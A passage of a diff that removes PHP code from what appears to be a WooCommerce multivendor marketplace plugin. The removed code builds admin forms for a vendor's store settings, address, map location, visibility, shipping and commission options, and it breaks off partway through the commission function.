-					$vendor_id = wcfm_get_vendor_id_by_post( $product_id );
-
-					if( $vendor_id ) {
-						$wpdb->update("{$wpdb->prefix}wcfm_marketplace_orders", array('item_id' => $order_item_id, 'product_id' => $product_id, 'variation_id' => $variation_id, 'quantity' => $line_item->get_quantity(), 'product_price' => $product->get_price()), array('order_id' => $order_id, 'vendor_id' => $vendor_id), array('%d', '%d', '%d', '%d', '%s'), array('%d', '%d'));
-					}
-				}
-			}
-		}
-	}
-
-	/**
-	 * Vendor Listing profile inf0
-	 */
-	function wcfmmp_vendors_listing_profile_info( $wcfm_vendors_name, $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( $vendor_id ) {
-			$store_user  = wcfmmp_get_store( absint( $vendor_id ) );
-			$email       = $store_user->get_email();
-			$phone       = $store_user->get_phone();
-			$address     = $store_user->get_address_string();
-
-			$wcfm_vendors_name .= '<span style="color:#555;">';
-			if( $email ) $wcfm_vendors_name .= '<br /><span style="line-height:2em;"><i class="wcfmfa fa-at" aria-hidden="true" style="color:#20a8d8;vertical-align: middle;"></i> <span>' . $email . '</span></span>';
-			if( $phone ) $wcfm_vendors_name .= '<br /><span style="line-height:2em;"><i class="wcfmfa fa-phone" aria-hidden="true" style="color:#20a8d8;"></i> <span>' . $phone . '</span></span>';
-			if( $address ) $wcfm_vendors_name .= '<br /><span><i class="wcfmfa fa-map-marker" aria-hidden="true" style="color:#20a8d8;"></i> <span>' . $address . '</span></span>';
-			$wcfm_vendors_name .= '</span>';
-		}
-		return $wcfm_vendors_name;
-
-	}
-
-	/**
-	 * Vendor Store Setting
-	 */
-	function wcfmmp_vendor_manage_marketplace_setting( $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( !$vendor_id ) return;
-
-		$disable_vendor = get_user_meta( $vendor_id, '_disable_vendor', true );
-		if( $disable_vendor ) return;
-
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		if( !$vendor_data ) $vendor_data = array();
-
-		$the_vendor_user = get_user_by( 'id', $vendor_id );
-
-		// Store General
-		$gravatar          = isset( $vendor_data['gravatar'] ) ? absint( $vendor_data['gravatar'] ) : 0;
-		$banner_type       = isset( $vendor_data['banner_type'] ) ? $vendor_data['banner_type'] : 'single_img';
-		$banner            = isset( $vendor_data['banner'] ) ? absint( $vendor_data['banner'] ) : 0;
-		$banner_video      = isset( $vendor_data['banner_video'] ) ? $vendor_data['banner_video'] : '';
-		$banner_slider     = isset( $vendor_data['banner_slider'] ) ? $vendor_data['banner_slider'] : array();
-		$list_banner_type  = isset( $vendor_data['list_banner_type'] ) ? $vendor_data['list_banner_type'] : 'single_img';
-		$list_banner       = isset( $vendor_data['list_banner'] ) ? absint( $vendor_data['list_banner'] ) : 0;
-		$list_banner_video = isset( $vendor_data['list_banner_video'] ) ? $vendor_data['list_banner_video'] : '';
-		$mobile_banner     = isset( $vendor_data['mobile_banner'] ) ? $vendor_data['mobile_banner'] : '';
-
-		$store_name     = wcfm_get_vendor_store_name( $vendor_id );
-		$store_slug     = '';
-		$user_email     = '';
-		if( $vendor_id != 99999 ) {
-			$store_name     = empty( $store_name ) ? $the_vendor_user->display_name : $store_name;
-			$store_slug     = $the_vendor_user->user_nicename;
-			$user_email     = $the_vendor_user->user_email;
-		}
-		$store_email      = isset( $vendor_data['store_email'] ) ? esc_attr( $vendor_data['store_email'] ) : $user_email;
-		$phone            = isset( $vendor_data['phone'] ) ? esc_attr( $vendor_data['phone'] ) : '';
-
-		// Shop Description
-		$shop_description = wcfm_get_user_meta( $vendor_id, '_store_description', true );
-
-		// Address
-		$address  = isset( $vendor_data['address'] ) ? $vendor_data['address'] : '';
-		$street_1 = isset( $vendor_data['address']['street_1'] ) ? $vendor_data['address']['street_1'] : '';
-		$street_2 = isset( $vendor_data['address']['street_2'] ) ? $vendor_data['address']['street_2'] : '';
-		$city     = isset( $vendor_data['address']['city'] ) ? $vendor_data['address']['city'] : '';
-		$zip      = isset( $vendor_data['address']['zip'] ) ? $vendor_data['address']['zip'] : '';
-		$country  = isset( $vendor_data['address']['country'] ) ? $vendor_data['address']['country'] : '';
-		$state    = isset( $vendor_data['address']['state'] ) ? $vendor_data['address']['state'] : '';
-
-		// Location
-		$store_location   = isset( $vendor_data['store_location'] ) ? esc_attr( $vendor_data['store_location'] ) : '';
-		$map_address    = isset( $vendor_data['find_address'] ) ? esc_attr( $vendor_data['find_address'] ) : '';
-		$store_lat    = isset( $vendor_data['store_lat'] ) ? esc_attr( $vendor_data['store_lat'] ) : 0;
-		$store_lng    = isset( $vendor_data['store_lng'] ) ? esc_attr( $vendor_data['store_lng'] ) : 0;
-
-		// Country -> States
-		$country_obj   = new WC_Countries();
-		$countries     = $country_obj->countries;
-		$states        = $country_obj->states;
-		$state_options = array();
-		if( $state && isset( $states[$country] ) && is_array( $states[$country] ) ) {
-			$state_options = $states[$country];
-		}
-		if( $state ) $state_options[$state] = $state;
-
-		// Gravatar image
-		$gravatar_url = $gravatar;// ? wp_get_attachment_url( $gravatar ) : '';
-
-		// List Banner URL
-		$list_banner_url = $list_banner;// ? wp_get_attachment_url( $list_banner ) : '';
-
-		// Banner URL
-		$banner_url = $banner;// ? wp_get_attachment_url( $banner ) : '';
-
-		// Mobile Banner URL
-		$mobile_banner_url = $mobile_banner;// ? wp_get_attachment_url( $mobile_banner ) : '';
-
-		// Visiblity
-		$global_store_name_position = isset( $WCFMmp->wcfmmp_marketplace_options['store_name_position'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_name_position'] : 'on_banner';
-		$store_name_position   = isset( $vendor_data['store_name_position'] ) ? esc_attr( $vendor_data['store_name_position'] ) : $global_store_name_position;
-		$global_store_ppp       = isset( $WCFMmp->wcfmmp_marketplace_options['store_ppp'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_ppp'] : get_option('posts_per_page');
-		$store_ppp              = isset( $vendor_data['store_ppp'] ) ? absint( $vendor_data['store_ppp'] ) : $global_store_ppp;
-		$store_hide_email       = isset( $vendor_data['store_hide_email'] ) ? esc_attr( $vendor_data['store_hide_email'] ) : 'no';
-		$store_hide_phone       = isset( $vendor_data['store_hide_phone'] ) ? esc_attr( $vendor_data['store_hide_phone'] ) : 'no';
-		$store_hide_address     = isset( $vendor_data['store_hide_address'] ) ? esc_attr( $vendor_data['store_hide_address'] ) : 'no';
-		$store_hide_map         = isset( $vendor_data['store_hide_map'] ) ? esc_attr( $vendor_data['store_hide_map'] ) : 'no';
-		$store_hide_description = isset( $vendor_data['store_hide_description'] ) ? esc_attr( $vendor_data['store_hide_description'] ) : 'no';
-		$store_hide_policy      = isset( $vendor_data['store_hide_policy'] ) ? esc_attr( $vendor_data['store_hide_policy'] ) : 'no';
-
-		$store_banner_width   = isset( $WCFMmp->wcfmmp_marketplace_options['store_banner_width'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_banner_width'] : '1650';
-		$store_banner_height  = isset( $WCFMmp->wcfmmp_marketplace_options['store_banner_height'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_banner_height'] : '350';
-		$store_banner_mwidth  = isset( $WCFMmp->wcfmmp_marketplace_options['store_banner_mwidth'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_banner_mwidth'] : '520';
-		$store_banner_mheight = isset( $WCFMmp->wcfmmp_marketplace_options['store_banner_mheight'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_banner_mheight'] : '150';
-
-		$banner_help_text = sprintf(
-				__('Upload a banner for your store. Banner size is (%sx%s) pixels.', 'wc-frontend-manager' ),
-				$store_banner_width, $store_banner_height
-		);
-
-		?>
-
-		<!-- collapsible -->
-		<div class="page_collapsible vendor_manage_store_setting" id="wcfm_vendor_manage_form_store_settings_head"><label class="wcfmfa fa-home"></label><?php _e( 'Store Settings', 'wc-frontend-manager' ); ?><span></span></div>
-		<div class="wcfm-container">
-			<div id="wcfm_vendor_manage_form_store_setting_expander" class="wcfm-content">
-			  <?php if( $vendor_id != 99999 ) { ?>
-				<form id="wcfm_vendor_manage_store_setting_form" class="wcfm">
-				<?php } ?>
-					<div class=""><h2><?php _e( 'General Setting', 'wc-multivendor-marketplace' ); ?></h2></div>
-					<div class="wcfm_clearfix"></div>
-
-					<div class="store_address">
-						<?php
-						$WCFM->wcfm_fields->wcfm_generate_form_field( apply_filters( 'wcfm_marketplace_settings_fields_general', array(
-																																																	"store_name"  => array('label' => __('Store Name', 'wc-frontend-manager') , 'type' => 'text', 'class' => 'wcfm-text wcfm_ele wcfm_name_input', 'label_class' => 'wcfm_title wcfm_ele', 'custom_attributes' => array( 'required' => true ), 'value' => $store_name ),
-																																																	"store_slug"  => array('label' => __('Store Slug', 'wc-frontend-manager') , 'type' => 'text', 'class' => 'wcfm-text wcfm_ele wcfm_slug_input', 'label_class' => 'wcfm_title wcfm_ele', 'custom_attributes' => array( 'required' => true ), 'value' => urldecode($store_slug) ),
-																																																	"store_email" => array('label' => __('Store Email', 'wc-frontend-manager') , 'type' => 'text', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $store_email ),
-																																																	"phone"       => array('label' => __('Store Phone', 'wc-frontend-manager') , 'type' => 'text', 'placeholder' => '+123456..', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $phone ),
-																																																	"vendor_id" => array( 'type' => 'hidden', 'value' => $vendor_id )
-																																																	), $vendor_id ) );
-
-						?>
-					</div>
-
-					<div class=""><h2><?php _e( 'Store Brand Setup', 'wc-multivendor-marketplace' ); ?></h2></div>
-					<div class="wcfm_clearfix"></div>
-
-					<div class="store_address">
-					  <?php
-					  $store_banner_types = array( 'single_img' => __( 'Static Image', 'wc-frontend-manager' ), 'slider' => __( 'Slider', 'wc-frontend-manager' ), 'video' => __( 'Video', 'wc-frontend-manager' ) );
-						$store_list_banner_types = array( 'single_img' => __( 'Static Image', 'wc-frontend-manager' ), 'video' => __( 'Video', 'wc-frontend-manager' ) );
-						$WCFM->wcfm_fields->wcfm_generate_form_field( apply_filters( 'wcfm_marketplace_settings_fields_general', array(
-																																																	"gravatar" => array('label' => __('Store Logo', 'wc-frontend-manager') , 'type' => 'upload', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title', 'prwidth' => 150, 'value' => $gravatar_url, 'hints' => __( 'Preferred  size is (125x125) pixels.', 'wc-frontend-manager' ) ),
-																																																	"banner_type" => array('label' => __('Store Banner Type', 'wc-frontend-manager') , 'type' => 'select', 'options' => array( 'single_img' => __( 'Static Image', 'wc-frontend-manager' ), 'slider' => __( 'Slider', 'wc-frontend-manager' ), 'video' => __( 'Video', 'wc-frontend-manager' ) ), 'class' => 'wcfm-select wcfm_ele wcfm-banner-uploads', 'label_class' => 'wcfm_title', 'value' => $banner_type, ),
-																																																	"banner" => array('label' => __('Banner', 'wc-frontend-manager') , 'type' => 'upload', 'class' => 'wcfm-text wcfm_ele banner_type_upload banner_type_field banner_type_single_img wcfm-banner-uploads', 'label_class' => 'wcfm_title banner_type_field banner_type_single_img', 'prwidth' => 250, 'value' => $banner_url, 'hints' => $banner_help_text ),
-																																																	"banner_video" => array('label' => __('Video Banner', 'wc-frontend-manager') , 'type' => 'text', 'class' => 'wcfm-text wcfm_ele banner_type_field banner_type_video', 'label_class' => 'wcfm_title banner_type_field banner_type_video','value' => $banner_video, 'hints' => __( 'Insert YouTube video URL.', 'wc-frontend-manager' ) ),
-																																																	"banner_slider"  => array( 'label' => __('Slider', 'wc-frontend-manager'), 'type' => 'multiinput', 'class' => 'wcfm-text wcfm_ele banner_type_upload banner_type_field banner_type_slider wcfm_non_sortable', 'label_class' => 'wcfm_title banner_type_field banner_type_slider', 'value' => $banner_slider, 'hints' => $banner_help_text, 'options' => array(
-																																																																										"image" => array( 'type' => 'upload', 'class' => 'wcfm_gallery_upload banner_type_upload wcfm-banner-uploads', 'prwidth' => 75),
-																																																																										"link"  => array( 'type' => 'text', 'class' => 'wcfm-text banner_type_slilder_link', 'placeholder' => __( 'Slider Hyperlink', 'wc-frontend-manager' ) ),
-																																																																									) ),
-																																																	"slider_break" => array( 'type' => 'html', 'value' => '<div class="wcfm_clearfix"></div>' ),
-
-																																																	"mobile_banner" => array('label' => __('Mobile Banner', 'wc-frontend-manager') , 'type' => 'upload', 'class' => 'wcfm-text wcfm_ele wcfm-banner-uploads', 'label_class' => 'wcfm_title', 'prwidth' => 250, 'value' => $mobile_banner_url, 'hints' => __( 'This Banner will be visible when someone browse store from Mobile.', 'wc-frontend-manager' ) ),
-
-																																																	"list_banner_type" => array('label' => __('Store List Banner Type', 'wc-frontend-manager') , 'type' => 'select', 'options' => $store_list_banner_types, 'class' => 'wcfm-select wcfm_ele wcfm-list-banner-uploads', 'label_class' => 'wcfm_title', 'value' => $list_banner_type ),
-																																																	"list_banner" => array('label' => __('Store List Banner', 'wc-frontend-manager') , 'type' => 'upload', 'class' => 'wcfm-text wcfm_ele wcfm-banner-uploads list_banner_type_upload list_banner_type_field list_banner_type_single_img', 'label_class' => 'wcfm_title list_banner_type_field list_banner_type_single_img', 'prwidth' => 250, 'value' => $list_banner_url, 'hints' => __( 'This Banner will be visible at Store List Page.', 'wc-frontend-manager' ) ),
-
-																																																	"list_banner_video" => array('label' => __('Store List Video Banner', 'wc-frontend-manager') , 'type' => 'text', 'class' => 'wcfm-text wcfm_ele list_banner_type_field list_banner_type_video', 'label_class' => 'wcfm_title list_banner_type_field list_banner_type_video','value' => $list_banner_video, 'hints' => __( 'Insert YouTube video URL.', 'wc-frontend-manager' ) ),
-
-																																																	"shop_description" => array('label' => __('Shop Description', 'wc-frontend-manager') , 'type' => 'wpeditor', 'class' => 'wcfm-textarea wcfm_ele wcfm_wpeditor', 'label_class' => 'wcfm_title', 'value' => $shop_description, 'hints' => __( 'This is displayed on your shop page.', 'wc-frontend-manager' ) ),
-																																																	), $vendor_id ) );
-					  ?>
-					</div>
-					<?php do_action( 'wcfmmp_admin_wcfm_store_general_settings_after', $vendor_id ); ?>
-
-					<?php if( $vendor_id != 99999 ) { ?>
-						<div class="wcfm-clearfix"></div>
-						<div class="wcfm-message" tabindex="-1"></div>
-						<div class="wcfm-clearfix"></div>
-						<div class="wcfm_messages_submit">
-							<input type="submit" name="save-data" value="<?php _e( 'Update', 'wc-frontend-manager' ); ?>" id="wcfm_store_general_setting_save_button" class="wcfm_submit_button" />
-						</div>
-						<div class="wcfm-clearfix"></div>
-				  <?php } ?>
-
-				  <?php if( !apply_filters('wcfm_is_pref_multi_store', true) ) { ?>
-					<div class="wcfm_clearfix"></div><br />
-					<div class="wcfm_vendor_settings_heading"><h2><?php _e( 'Store Address', 'wc-frontend-manager' ); ?></h2></div>
-					<div class="wcfm_clearfix"></div>
-
-					<div class="store_address store_address_wrap">
-						<?php
-							$WCFM->wcfm_fields->wcfm_generate_form_field( apply_filters( 'wcfm_marketplace_settings_fields_address', array(
-																																																"street_1" => array('label' => __('Street', 'wc-frontend-manager'), 'placeholder' => __('Street address', 'wc-frontend-manager'), 'name' => 'address[street_1]', 'type' => 'text', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $street_1 ),
-																																																"street_2" => array('label' => __('Street 2', 'wc-frontend-manager'), 'placeholder' => __('Apartment, suite, unit etc. (optional)', 'wc-frontend-manager'), 'name' => 'address[street_2]', 'type' => 'text', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $street_2 ),
-																																																"city" => array('label' => __('City/Town', 'wc-frontend-manager'), 'placeholder' => __('Town / City', 'wc-frontend-manager'), 'name' => 'address[city]', 'type' => 'text', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $city ),
-																																																"zip" => array('label' => __('Postcode/Zip', 'wc-frontend-manager'), 'placeholder' => __('Postcode / Zip', 'wc-frontend-manager'), 'name' => 'address[zip]', 'type' => 'text', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $zip ),
-																																																"country" => array('label' => __('Country', 'wc-frontend-manager'), 'name' => 'address[country]', 'type' => 'country', 'class' => 'wcfm-select wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $country ),
-																																																"state" => array('label' => __('State/County', 'wc-frontend-manager'), 'name' => 'address[state]', 'type' => 'select', 'class' => 'wcfm-select wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'options' => $state_options, 'value' => $state ),
-																																																), $vendor_id ) );
-						?>
-					</div>
-					<?php do_action( 'wcfmmp_admin_wcfm_store_address_settings_after', $vendor_id ); ?>
-					<script type="text/javascript">
-						var selected_state = '<?php echo esc_attr($state); ?>';
-						var input_selected_state = '<?php echo esc_attr($state); ?>';
-					</script>
-
-					<?php
-					$api_key = isset( $WCFMmp->wcfmmp_marketplace_options['wcfm_google_map_api'] ) ? $WCFMmp->wcfmmp_marketplace_options['wcfm_google_map_api'] : '';
-					$wcfm_map_lib = isset( $WCFMmp->wcfmmp_marketplace_options['wcfm_map_lib'] ) ? $WCFMmp->wcfmmp_marketplace_options['wcfm_map_lib'] : '';
-					if( !$wcfm_map_lib && $api_key ) { $wcfm_map_lib = 'google'; } elseif( !$wcfm_map_lib && !$api_key ) { $wcfm_map_lib = 'leaftlet'; }
-					if ( ( ($wcfm_map_lib == 'google') && !empty( $api_key ) ) || ($wcfm_map_lib == 'leaflet') ) {
-						?>
-						<div class="wcfm_clearfix"></div><br />
-						<div class="wcfm_vendor_settings_heading"><h2><?php _e( 'Store Location', 'wc-frontend-manager' ); ?></h2></div>
-						<div class="wcfm_clearfix"></div>
-						<div class="store_address store_location_wrap">
-							<?php
-								$WCFM->wcfm_fields->wcfm_generate_form_field( apply_filters( 'wcfm_marketplace_settings_fields_location', array(
-																																																	"find_address" => array( 'label' => __( 'Find Location', 'wc-frontend-manager' ), 'placeholder' => __( 'Type an address to find', 'wc-frontend-manager' ), 'type' => 'text', 'name' => 'geolocation[find_address]', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title wcfm_ele', 'value' => $map_address ),
-																																																	"store_location" => array( 'type' => 'hidden', 'name' => 'geolocation[store_location]', 'value' => $store_location ),
-																																																	"store_lat" => array( 'type' => 'hidden', 'name' => 'geolocation[store_lat]', 'value' => $store_lat ),
-																																																	"store_lng" => array( 'type' => 'hidden', 'name' => 'geolocation[store_lng]', 'value' => $store_lng ),
-																																																	), $vendor_id ) );
-							?>
-							<div class="wcfm_clearfix"></div><br />
-							<div class="wcfm-marketplace-google-map" id="wcfm-marketplace-map"></div>
-							<div class="wcfm_clearfix"></div><br />
-						</div>
-					<?php
-					}
-					?>
-					<?php do_action( 'wcfmmp_admin_wcfm_store_location_settings_after', $vendor_id ); ?>
-
-					<?php if( $vendor_id != 99999 ) { ?>
-						<div class="wcfm-clearfix"></div>
-						<div class="wcfm-message" tabindex="-1"></div>
-						<div class="wcfm-clearfix"></div>
-						<div class="wcfm_messages_submit">
-							<input type="submit" name="save-data" value="<?php _e( 'Update', 'wc-frontend-manager' ); ?>" id="wcfm_store_address_setting_save_button" class="wcfm_submit_button" />
-						</div>
-						<div class="wcfm-clearfix"></div>
-				  	<?php } ?>
-				  <?php } ?>
-				  <?php do_action('wcfmmp_admin_before_store_visibility_settings', $vendor_id); ?>
-					<div class="wcfm_clearfix"></div><br />
-					<div class="wcfm_vendor_settings_heading"><h2><?php _e( 'Visibility Setup', 'wc-multivendor-marketplace' ); ?></h2></div>
-					<div class="wcfm_clearfix"></div>
-
-					<div class="store_address store_visibility_wrap">
-						<?php
-							$WCFM->wcfm_fields->wcfm_generate_form_field( apply_filters( 'wcfm_marketplace_settings_fields_visibility', array(
-								"store_name_position" => array( 'label' => __('Store Name Position', 'wc-multivendor-marketplace'), 'type' => 'select', 'options' => array( 'on_banner' => __( 'On Banner', 'wc-multivendor-marketplace' ), 'on_header' => __( 'At Header', 'wc-multivendor-marketplace' ) ), 'class' => 'wcfm-select wcfm_ele', 'label_class' => 'wcfm_title', 'value' => $store_name_position, 'hints' => __( 'Store name position at you Store Page.', 'wc-frontend-manager' ) ),
-								"store_ppp" => array( 'label' => __('Products per page', 'wc-multivendor-marketplace'), 'type' => 'number', 'class' => 'wcfm-text wcfm_ele', 'label_class' => 'wcfm_title', 'value' => $store_ppp, 'attributes' => array( 'min'=> 1, 'step' => 1 ), 'hints' => __( 'No of products at you Store Page.', 'wc-frontend-manager' ) ),
-								"store_hide_email" => array('label' => __( 'Hide Email from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_email ),
-								"store_hide_phone" => array('label' => __( 'Hide Phone from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_phone ),
-								"store_hide_address" => array('label' => __( 'Hide Address from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_address ),
-								"store_hide_map" => array('label' => __( 'Hide Map from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_map ),
-								"store_hide_description" => array('label' => __( 'Hide About from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_description ),
-								"store_hide_policy" => array('label' => __( 'Hide Policy from Store', 'wc-frontend-manager') , 'type' => 'checkbox', 'class' => 'wcfm-checkbox wcfm_ele', 'label_class' => 'wcfm_title checkbox_title wcfm_ele', 'value' => 'yes', 'dfvalue' => $store_hide_policy ),
-								), $vendor_id ) );
-						?>
-					</div>
-
-					<?php do_action( 'wcfmmp_admin_wcfm_vendor_settings_after', $vendor_id ); ?>
-
-					<?php if( $vendor_id != 99999 ) { ?>
-					<div class="wcfm-clearfix"></div>
-					<div class="wcfm-message" tabindex="-1"></div>
-					<div class="wcfm-clearfix"></div>
-					<div class="wcfm_messages_submit">
-						<input type="submit" name="save-data" value="<?php _e( 'Update', 'wc-frontend-manager' ); ?>" id="wcfm_store_setting_save_button" class="wcfm_submit_button" />
-					</div>
-					<div class="wcfm-clearfix"></div>
-				</form>
-				<?php } ?>
-			</div>
-		</div>
-		<div class="wcfm_clearfix"></div>
-		<?php if( $vendor_id != 99999 ) { ?>
-			<br />
-		<?php } ?>
-		<!-- end collapsible -->
-
-		<?php
-	}
-
-	/**
-	 * Vendor Store Shipping by Admin
-	 */
-	function wcfmmp_vendor_manage_shipping_setting( $vendor_id ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		if( !apply_filters( 'wcfm_is_allow_store_shipping', true ) ) return;
-		if( !apply_filters( 'wcfm_is_allow_store_shipping_by_admin', true ) ) return;
-
-		$wcfm_shipping_options = get_option( 'wcfm_shipping_options', array() );
-		$wcfmmp_store_shipping_enabled = isset( $wcfm_shipping_options['enable_store_shipping'] ) ? $wcfm_shipping_options['enable_store_shipping'] : 'yes';
-		if( $wcfmmp_store_shipping_enabled != 'yes' ) return;
-		?>
-
-		<!-- collapsible -->
-		<div class="page_collapsible vendor_manage_store_shipping_setting" id="wcfm_vendor_manage_form_store_shipping_settings_head"><label class="wcfmfa fa-truck"></label><?php _e( 'Store Shipping', 'wc-multivendor-marketplace' ); ?><span></span></div>
-		<div class="wcfm-container">
-			<div id="wcfm_vendor_manage_form_store_shipping_setting_expander" class="wcfm-content">
-			  <?php if( $vendor_id != 99999 ) { ?>
-				<form id="wcfm_vendor_manage_store_shipping_setting_form" class="wcfm">
-				<?php } ?>
-
-				<?php do_action( 'wcfm_marketplace_shipping', $vendor_id ); ?>
-
-				<?php if( $vendor_id != 99999 ) { ?>
-					<div class="wcfm-clearfix"></div>
-					<div class="wcfm-message" tabindex="-1"></div>
-					<div class="wcfm-clearfix"></div>
-					<div id="wcfm_messages_submit">
-					  <input type="hidden" name="store_id" value="<?php echo esc_attr($vendor_id); ?>" />
-						<input type="submit" name="save-shipping-data" value="<?php esc_html_e( 'Update', 'wc-frontend-manager' ); ?>" id="wcfm_store_shipping_setting_save_button" class="wcfm_submit_button" />
-					</div>
-					<div class="wcfm-clearfix"></div>
-				</form>
-				<?php } ?>
-			</div>
-		</div>
-		<div class="wcfm_clearfix"></div>
-		<?php if( $vendor_id != 99999 ) { ?>
-			<br />
-		<?php } ?>
-		<!-- end collapsible -->
-
-		<?php
-	}
-
-
-	/**
-	 * Vendor Store Commission & Withdrwal Setting
-	 */
-	function wcfmmp_vendor_manage_commission_setting( $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( !$vendor_id ) return;
-
-		if( !apply_filters( 'wcfm_is_allow_view_commission', true ) || !apply_filters( 'wcfm_is_allow_commission_manage', true ) ) return;
-
-		$disable_vendor = get_user_meta( $vendor_id, '_disable_vendor', true );
-		if( $disable_vendor ) return;
-
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		if( !$vendor_data ) $vendor_data = array();
-
-		// Payment
-		$payment_mode = isset( $vendor_data['payment']['method'] ) ? esc_attr( $vendor_data['payment']['method'] ) : '' ;
-		$paypal = isset( $vendor_data['payment']['paypal']['email'] ) ? esc_attr( $vendor_data['payment']['paypal']['email'] ) : '' ;
-		$skrill = isset( $vendor_data['payment']['skrill']['email'] ) ? esc_attr( $vendor_data['payment']['skrill']['email'] ) : '' ;
-		$ac_name   = isset( $vendor_data['payment']['bank']['ac_name'] ) ? esc_attr( $vendor_data['payment']['bank']['ac_name'] ) : '';
-		$ac_number = isset( $vendor_data['payment']['bank']['ac_number'] ) ? esc_attr( $vendor_data['payment']['bank']['ac_number'] ) : '';
-		$bank_name      = isset( $vendor_data['payment']['bank']['bank_name'] ) ? esc_attr( $vendor_data['payment']['bank']['bank_name'] ) : '';
-		$bank_addr      = isset( $vendor_data['payment']['bank']['bank_addr'] ) ? esc_textarea( $vendor_data['payment']['bank']['bank_addr'] ) : '';
-		$routing_number = isset( $vendor_data['payment']['bank']['routing_number'] ) ? esc_attr( $vendor_data['payment']['bank']['routing_number'] ) : '';
-		$iban           = isset( $vendor_data['payment']['bank']['iban'] ) ? esc_attr( $vendor_data['payment']['bank']['iban'] ) : '';
-		$swift     = isset( $vendor_data['payment']['bank']['swift'] ) ? esc_attr( $vendor_data['payment']['bank']['swift'] ) : '';
-		$ifsc     = isset( $vendor_data['payment']['bank']['ifsc'] ) ? esc_attr( $vendor_data['payment']['bank']['ifsc'] ) : '';
-
-		// Commission
-		$wcfm_commission_options = get_option( 'wcfm_commission_options', array() );
-		$wcfm_commission_for = isset( $wcfm_commission_options['commission_for'] ) ? $wcfm_commission_options['commission_for'] : 'vendor';
-
-		$wcfm_commission_types = get_wcfm_marketplace_commission_types();
-		$wcfm_commission_types = array_merge( array( 'global' => __( 'By Global Rule', 'wc-multivendor-marketplace' ) ), $wcfm_commission_types );
-
-		$vendor_commission_mode        = isset( $vendor_data['commission']['commission_mode'] ) ? $vendor_data['commission']['commission_mode'] : 'global';
-		$vendor_commission_fixed       = isset( $vendor_data['commission']['commission_fixed'] ) ? $vendor_data['commission']['commission_fixed'] : '';
-		$vendor_commission_percent     = isset( $vendor_data['commission']['commission_percent'] ) ? $vendor_data['commission']['commission_percent'] : '90';
-		$vendor_commission_by_sales    = isset( $vendor_data['commission']['commission_by_sales'] ) ? $vendor_data['commission']['commission_by_sales'] : array();
-		$vendor_commission_by_products = isset( $vendor_data['commission']['commission_by_products'] ) ? $vendor_data['commission']['commission_by_products'] : array();
-		$vendor_commission_by_quantity = isset( $vendor_data['commission']['commission_by_quantity'] ) ? $vendor_data['commission']['commission_by_quantity'] : array();
-		$vendor_get_shipping           = isset( $vendor_data['commission']['get_shipping'] ) ? $vendor_data['commission']['get_shipping'] : '';
-		$vendor_get_tax                = isset( $vendor_data['commission']['get_tax'] ) ? $vendor_data['commission']['get_tax'] : '';
-		$vendor_coupon_deduct          = isset( $vendor_data['commission']['coupon_deduct'] ) ? $vendor_data['commission']['coupon_deduct'] : '';
-		$admin_coupon_deduct           = isset( $vendor_data['commission']['admin_coupon_deduct'] ) ? $vendor_data['commission']['admin_coupon_deduct'] : '';
-
-		$tax_enable                    = isset( $vendor_data['commission']['tax_enable'] ) ? 'yes' : 'no';
-		$tax_name                      = isset( $vendor_data['commission']['tax_name'] ) ? $vendor_data['commission']['tax_name'] : '';
-		$tax_percent                   = isset( $vendor_data['commission']['tax_percent'] ) ? $vendor_data['commission']['tax_percent'] : '';
-
-		// Withdrawal
-		$wcfm_withdrawal_options = array( 'global' => __( 'By Global Rule', 'wc-multivendor-marketplace' ), 'vendor' => __( 'Vendor Specific Rule', 'wc-multivendor-marketplace' ) );
-
-		// Global Options
-		$withdrawal_global_options       = get_option( 'wcfm_withdrawal_options', array() );
-		$request_auto_approve            = isset( $withdrawal_global_options['request_auto_approve'] ) ? $withdrawal_global_options['request_auto_approve'] : 'no';
-		$withdrawal_limit                = isset( $withdrawal_global_options['withdrawal_limit'] ) ? $withdrawal_global_options['withdrawal_limit'] : '';
-		$withdrawal_thresold             = isset( $withdrawal_global_options['withdrawal_thresold'] ) ? $withdrawal_global_options['withdrawal_thresold'] : '';
